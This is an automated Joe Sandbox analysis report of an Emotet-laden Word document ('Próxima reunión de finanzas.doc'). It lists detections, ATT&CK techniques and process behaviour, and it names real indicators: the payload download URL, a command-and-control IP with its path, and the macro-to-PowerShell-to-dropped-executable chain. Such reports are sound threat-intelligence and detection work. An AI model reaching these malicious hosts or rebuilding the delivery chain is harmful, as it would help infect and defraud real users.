
Analysis Report Próxima reunión de finanzas.doc

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 212266
Start date: 02.03.2020
Start time: 18:05:07
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 46s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Próxima reunión de finanzas.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winDOC@8/17@2/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 89% (good quality ratio 85.7%)
  • Quality average: 77.5%
  • Quality standard deviation: 28.5%
HCA Information:
  • Successful, ratio: 74%
  • Number of executed functions: 88
  • Number of non-executed functions: 259
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: Emotet
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Techniques listed per tactic column (a number in parentheses is the report's matched-signature marker for that technique, reproduced as extracted):

  • Initial Access: Valid Accounts (1), Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment, Spearphishing via Service, Supply Chain Compromise, Trusted Relationship
  • Execution: Windows Management Instrumentation (11), PowerShell (4), Scripting (2), Execution through API (131), Exploitation for Client Execution (3), Graphical User Interface (1), Command-Line Interface (113), Service Execution (12), Rundll32, PowerShell
  • Persistence: Hidden Files and Directories (1), Valid Accounts (1), Modify Existing Service (11), New Service (2), Shortcut Modification, Modify Existing Service, Path Interception, Logon Scripts, DLL Search Order Hijacking, Change Default File Association
  • Privilege Escalation: Valid Accounts (1), Access Token Manipulation (1), Process Injection (11), New Service (2), File System Permissions Weakness, New Service, Scheduled Task, Process Injection, Service Registry Permissions Weakness, Exploitation for Privilege Escalation
  • Defense Evasion: Disabling Security Tools (1), Deobfuscate/Decode Files or Information (11), Scripting (2), Obfuscated Files or Information (2), Masquerading (221), Hidden Files and Directories (1), Valid Accounts (1), Virtualization/Sandbox Evasion (2), Access Token Manipulation (1), Process Injection (11)
  • Credential Access: Input Capture (1), Network Sniffing, Input Capture, Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception, Bash History, Input Prompt, Keychain
  • Discovery: System Time Discovery (2), Security Software Discovery (12), System Service Discovery (1), File and Directory Discovery (3), System Information Discovery (37), Query Registry (1), Virtualization/Sandbox Evasion (2), Process Discovery (2), Application Window Discovery (1), Remote System Discovery (1)
  • Lateral Movement: Remote File Copy (3), Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash, Remote Desktop Protocol, Windows Admin Shares, Taint Shared Content
  • Collection: Input Capture (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Data Staged, Screen Capture, Email Collection, Clipboard Data, Automated Collection, Audio Capture
  • Exfiltration: Data Encrypted (11), Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Physical Medium, Commonly Used Port
  • Command and Control: Remote File Copy (3), Standard Cryptographic Protocol (22), Standard Non-Application Layer Protocol (2), Standard Application Layer Protocol (3), Standard Cryptographic Protocol, Commonly Used Port, Uncommonly Used Port, Standard Application Layer Protocol, Multilayer Encryption, Connection Proxy
  • Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
  • Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
  • Impact: Data Encrypted for Impact (1), Device Lockout, Delete Device Data, Premium SMS Toll Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact

Signature Overview



AV Detection:

Antivirus detection for URL or domain
  • Source: khomaynhomnhua.vn; Google Safe Browsing: Label: phishing
  • Source: http://khomaynhomnhua.vn/dup-installer/tyl31xi-nmfh-643542/; Google Safe Browsing: Label: phishing
Antivirus detection for dropped file
  • Source: C:\Users\user\633.exe; Avira: detection malicious, Label: TR/AD.Emotet.ervx
Antivirus detection for sample
  • Source: Próxima reunión de finanzas.doc; Avira: detection malicious, Label: VBA/Dldr.Agent.pucid
Found malware configuration
  • Source: inettimeout.exe.2312.6.memstr; Malware Configuration Extractor: Emotet {"C2 list": ["42.115.22.145/jHnnLdTLu1NRMhU"]}
Multi AV Scanner detection for domain / URL
  • Source: khomaynhomnhua.vn; Virustotal: Detection: 14%
  • Source: http://khomaynhomnhua.vn/dup-installer/tyl31xi-nmfh-643542/; Virustotal: Detection: 18%
Multi AV Scanner detection for dropped file
  • Source: C:\Users\user\633.exe; Virustotal: Detection: 79%
  • Source: C:\Users\user\633.exe; ReversingLabs: Detection: 90%
Multi AV Scanner detection for submitted file
  • Source: Próxima reunión de finanzas.doc; Virustotal: Detection: 64%
  • Source: Próxima reunión de finanzas.doc; ReversingLabs: Detection: 54%
Machine Learning detection for sample
  • Source: Próxima reunión de finanzas.doc; Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
  • Source: C:\Users\user\633.exe; Code function: 4_2_003D207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash
  • Source: C:\Users\user\633.exe; Code function: 4_2_003D1F11 CryptExportKey
  • Source: C:\Users\user\633.exe; Code function: 4_2_003D1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext
  • Source: C:\Users\user\633.exe; Code function: 4_2_003D215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash
  • Source: C:\Users\user\633.exe; Code function: 4_2_003D1F56 CryptGetHashParam
  • Source: C:\Users\user\633.exe; Code function: 4_2_003D1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext
  • Source: C:\Windows\System32\inettimeout.exe; Code function: 6_2_003B1F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext
  • Source: C:\Windows\System32\inettimeout.exe; Code function: 6_2_003B1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext
  • Source: C:\Windows\System32\inettimeout.exe; Code function: 6_2_003B207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash
  • Source: C:\Windows\System32\inettimeout.exe; Code function: 6_2_003B1F11 CryptExportKey
  • Source: C:\Windows\System32\inettimeout.exe; Code function: 6_2_003B215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash
  • Source: C:\Windows\System32\inettimeout.exe; Code function: 6_2_003B1F56 CryptGetHashParam

Spreading:

Contains functionality to enumerate / list files inside a directory
  • Source: C:\Users\user\633.exe; Code function: 3_2_0042A28A __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA
Enumerates the file system
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
  • Source: global traffic; DNS query: name: luislar68.000webhostapp.com
Potential document exploit detected (performs HTTP gets)
  • Source: global traffic; TCP traffic: 192.168.2.2:49158 -> 145.14.144.203:443
Potential document exploit detected (unknown TCP traffic)
  • Source: global traffic; TCP traffic: 192.168.2.2:49158 -> 145.14.144.203:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • Source: Traffic; Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.2:49160 -> 42.115.22.145:80
HTTP GET or POST without a user agent
  • Source: global traffic; HTTP traffic detected: GET /dup-installer/tyl31xi-nmfh-643542/ HTTP/1.1 Host: khomaynhomnhua.vn Connection: Keep-Alive
IP address seen in connection with other malware
  • Source: Joe Sandbox View; IP Address: 45.122.220.220
Internet Provider seen in connection with other malware
  • Source: Joe Sandbox View; ASN Name: unknown
JA3 SSL client fingerprint seen in connection with other malware
  • Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Connects to IPs without corresponding DNS lookups
  • Source: unknown; TCP traffic detected without corresponding DNS query: 42.115.22.145 (5 identical entries)
Contains functionality to download additional files from the internet
  • Source: C:\Windows\System32\inettimeout.exe; Code function: 6_2_003B1383 InternetReadFile
Downloads files
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
  • Source: global traffic; HTTP traffic detected: GET /dup-installer/tyl31xi-nmfh-643542/ HTTP/1.1 Host: khomaynhomnhua.vn Connection: Keep-Alive
Performs DNS lookups
  • Source: unknown; DNS traffic detected: queries for: luislar68.000webhostapp.com
Urls found in memory or binary data
  • Source: inettimeout.exe, 00000006.00000002.1264757594.0027B000.00000004.00000020.sdmp; String found in binary or memory: http://42.115.22.145/jHnnLdTLu1NRMhUpxrV
Uses HTTPS
  • Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49158
  • Source: unknown; Network traffic detected: HTTP traffic on port 49158 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Potential key logger detected (key state polling based)
  • Source: C:\Users\user\633.exe; Code function: 3_2_0042400F GetKeyState,GetKeyState,GetKeyState,GetTickCount,SetCapture,PeekMessageA,GetCapture,PeekMessageA,PeekMessageA,PtInRect,GetTickCount,ReleaseCapture
  • Source: C:\Users\user\633.exe; Code function: 3_2_0041ED6E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
  • Source: C:\Users\user\633.exe; Code function: 3_2_0040F1B0 GetKeyState,InvalidateRect,GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,SendMessageA,GetKeyState,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetKeyState,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetKeyState,SendMessageA,SendMessageA,GetKeyState,SendMessageA,SendMessageA,SendMessageA,InvalidateRect,SendMessageA,SendMessageA

E-Banking Fraud:

Detected Emotet e-Banking trojan
  • Source: C:\Users\user\633.exe; Code function: 4_2_003DE20C
  • Source: C:\Windows\System32\inettimeout.exe; Code function: 6_2_003BE20C
Malicious encrypted Powershell command line found
  • Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e [base64-encoded command line omitted]
Yara detected Emotet
  • Source: Yara match; File source: 00000004.00000002.1111713947.003D1000.00000020.00000001.sdmp, type: MEMORY
  • Source: Yara match; File source: 00000004.00000002.1111686165.003B0000.00000040.00000001.sdmp, type: MEMORY
  • Source: Yara match; File source: 00000005.00000002.1110806927.005D1000.00000020.00000001.sdmp, type: MEMORY
  • Source: Yara match; File source: 00000003.00000002.1077077349.00261000.00000020.00000001.sdmp, type: MEMORY
  • Source: Yara match; File source: 00000003.00000002.1077030362.00240000.00000040.00000001.sdmp, type: MEMORY
  • Source: Yara match; File source: 00000006.00000002.1264863490.003B1000.00000020.00000001.sdmp, type: MEMORY
  • Source: Yara match; File source: 00000005.00000002.1110775932.005B0000.00000040.00000001.sdmp, type: MEMORY
  • Source: Yara match; File source: 00000006.00000002.1264701291.00200000.00000040.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
  • Source: C:\Users\user\633.exe; Code function: 4_2_003D1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext
  • Source: C:\Windows\System32\inettimeout.exe; Code function: 6_2_003B1F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext

System Summary:

Malicious sample detected (through community Yara rule)
  • Source: 00000004.00000002.1111713947.003D1000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload Author: kevoreilly
  • Source: 00000004.00000002.1111686165.003B0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload Author: kevoreilly
  • Source: 00000005.00000002.1110806927.005D1000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload Author: kevoreilly
  • Source: 00000003.00000002.1077077349.00261000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload Author: kevoreilly
  • Source: 00000003.00000002.1077030362.00240000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload Author: kevoreilly
  • Source: 00000006.00000002.1264863490.003B1000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload Author: kevoreilly
  • Source: 00000005.00000002.1110775932.005B0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload Author: kevoreilly
  • Source: 00000006.00000002.1264701291.00200000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
  • Source: Screenshot number: 4; Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
  • Source: Screenshot number: 4; Screenshot OCR: Enable content button. O Page, I of I I Words:O I I @13,2 100%e) A GE) a L@
  • Source: Document image extraction number: 0; Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
  • Source: Document image extraction number: 0; Screenshot OCR: Enable content button.
  • Source: Document image extraction number: 1; Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
  • Source: Document image extraction number: 1; Screenshot OCR: Enable content button.
  • Source: Screenshot number: 8; Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
  • Source: Screenshot number: 8; Screenshot OCR: Enable content button. mj ,1
Powershell drops PE file
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\633.exe
Very long command line found
  • Source: unknown; Process created: Commandline size = 2323
Contains functionality to delete services
  • Source: C:\Users\user\633.exe; Code function: 4_2_003DE3D8 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle
Contains functionality to launch a process as a different user
  • Source: C:\Users\user\633.exe; Code function: 4_2_003D1D2B CreateProcessAsUserW,CreateProcessW
Detected potential crypto function
  • Source: C:\Users\user\633.exe and C:\Windows\System32\inettimeout.exe; Code function: [list of bare function addresses omitted]
Document contains an embedded VBA macro which executes code when the document is opened / closed
  • Source: Próxima reunión de finanzas.doc; OLE, VBA macro line: Private Sub Document_open()
  • Source: VBA code instrumentation; OLE, VBA macro: Module Timmoxybbxqk, Function Document_open; Name: Document_open
Document contains embedded VBA macros
  • Source: Próxima reunión de finanzas.doc; OLE indicator, VBA macros: true
Document contains no OLE stream with summary information
  • Source: Próxima reunión de finanzas.doc; OLE indicator has summary info: false
Document has an unknown application name
  • Source: Próxima reunión de finanzas.doc; OLE indicator application name: unknown
Found potential string decryption / allocating functions
  • Source: C:\Users\user\633.exe; Code function: String function: 0043024C appears 57 times
  • Source: C:\Users\user\633.exe; Code function: String function: 0041C21C appears 33 times
  • Source: C:\Users\user\633.exe; Code function: String function: 004011F0 appears 31 times
  • Source: C:\Users\user\633.exe; Code function: String function: 0042FFFB appears 107 times
PE file contains strange resources
  • Source: 633.exe.1.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (3 identical entries)
Yara signature match
  • Source: 00000004.00000002.1111713947.003D1000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
  • Source: 00000004.00000002.1111686165.003B0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
  • Source: 00000005.00000002.1110806927.005D1000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
  • Source: 00000003.00000002.1077077349.00261000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
  • Source: 00000003.00000002.1077030362.00240000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
  • Source: 00000006.00000002.1264863490.003B1000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
  • Source: 00000005.00000002.1110775932.005B0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
  • Source: 00000006.00000002.1264701291.00200000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification label
  • Source: classification engine; Classification label: mal100.bank.troj.evad.winDOC@8/17@2/3
Contains functionality to create services
  • Source: C:\Users\user\633.exe; Code function: 4_2_003DE4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
  • Source: C:\Windows\System32\inettimeout.exe; Code function: 6_2_003BE4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Contains functionality to enum processes or threads
  • Source: C:\Users\user\633.exe; Code function: 3_2_00261943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Contains functionality to load and extract PE file embedded resources
  • Source: C:\Users\user\633.exe; Code function: 3_2_00421455 FindResourceA,LoadResource,LockResource,FreeResource
Contains functionality to modify services (start/stop/modify)
  • Source: C:\Users\user\633.exe; Code function: 4_2_003DE4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Creates files inside the user directory
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\Desktop\~$óxima reunión de finanzas.doc
Creates mutexes
  • Source: C:\Users\user\633.exe; Mutant created: \Sessions\1\BaseNamedObjects\Global\M949911AE
  • Source: C:\Windows\System32\inettimeout.exe; Mutant created: \BaseNamedObjects\Global\I949911AE
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
  • Source: C:\Users\user\633.exe; Mutant created: \Sessions\1\BaseNamedObjects\Global\I949911AE
Creates temporary files
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\CVR5EDF.tmp
Document contains summary information with irregular field values
  • Source: Próxima reunión de finanzas.doc; OLE document summary: title field not present or empty
  • Source: Próxima reunión de finanzas.doc; OLE document summary: author field not present or empty
  • Source: Próxima reunión de finanzas.doc; OLE document summary: edited time not present or 0
Found command line output
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: [binary console output dump omitted]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......G..............u,..................u..0.............h.......................G...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......K...R.e.t.u.r.n.V.a.l.u.e. . . . . . .:. .0.........h.......................K...........(...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......K..............u,..................u..0.............h.......................K...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................O.......<......u...................u..0.............h.......................O.......x.......>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................S..............u...................u..0.............h...)...................S...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................W..............u...................u..0.............h...6...................W...............>..u........Jump to behavior
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries process information (via WMI, Win32_Process)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\inettimeout.exe File read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.doc Virustotal: Detection: 64%
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.doc ReversingLabs: Detection: 54%
Sample requires command line parameters (based on API chain)
Source: C:\Users\user\633.exe Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess graph_3-38094
Source: C:\Windows\System32\inettimeout.exe Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess graph_5-4532
Spawns processes
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e
Source: unknown Process created: C:\Users\user\633.exe C:\Users\user\633.exe
Source: unknown Process created: C:\Users\user\633.exe --4bc37bca
Source: unknown Process created: C:\Windows\System32\inettimeout.exe C:\Windows\system32\inettimeout.exe
Source: unknown Process created: C:\Windows\System32\inettimeout.exe --597fd3a1
Source: C:\Users\user\633.exe Process created: C:\Users\user\633.exe --4bc37bca
Source: C:\Windows\System32\inettimeout.exe Process created: C:\Windows\System32\inettimeout.exe --597fd3a1
Uses an in-process (OLE) Automation server
Source: C:\Users\user\633.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Executable creates window controls seldom found in malware
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32
Found graphical window changes (likely an installer)
Source: Window Recorder Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Data Obfuscation:

PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e
Contains functionality to dynamically determine API calls
Source: C:\Users\user\633.exe Code function: 3_2_00418120 GetModuleHandleA,LoadLibraryA,GetProcAddress, 3_2_00418120
PE file contains an invalid checksum
Source: 633.exe.1.dr Static PE information: real checksum: 0x8ba46 should be: 0x8bc09
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\633.exe Code function: 3_2_0043009A push ecx; ret 3_2_004300AD
Source: C:\Users\user\633.exe Code function: 3_2_00430291 push ecx; ret 3_2_004302A4

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the Windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\inettimeout.exe Executable created and started: C:\Windows\System32\inettimeout.exe
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\633.exe
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\633.exe
Drops PE files to the Windows directory (C:\Windows)
Source: C:\Users\user\633.exe PE file moved: C:\Windows\System32\inettimeout.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\633.exe
Contains functionality to start Windows services
Source: C:\Users\user\633.exe Code function: 4_2_003DE4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle, 4_2_003DE4A8

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (Zone.Identifier)
Source: C:\Users\user\633.exe File opened: C:\Windows\system32\inettimeout.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\633.exe Code function: 3_2_0042C3DF PtInRect,GetParent,GetParent,IsIconic,GetParent, 3_2_0042C3DF
Source: C:\Users\user\633.exe Code function: 3_2_0041C474 IsIconic,GetWindowPlacement,GetWindowRect, 3_2_0041C474
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\633.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\inettimeout.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\System32\inettimeout.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess | graph_5-4626
Source: C:\Users\user\633.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess | graph_4-4580
Contains functionality to enumerate running services
Source: C:\Users\user\633.exe | Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,4_2_003DE20C
Source: C:\Windows\System32\inettimeout.exe | Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,6_2_003BE20C
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Found evasive API chain (date check)
Source: C:\Users\user\633.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_3-37862
Found evasive API chain (may stop execution after checking a module file name)
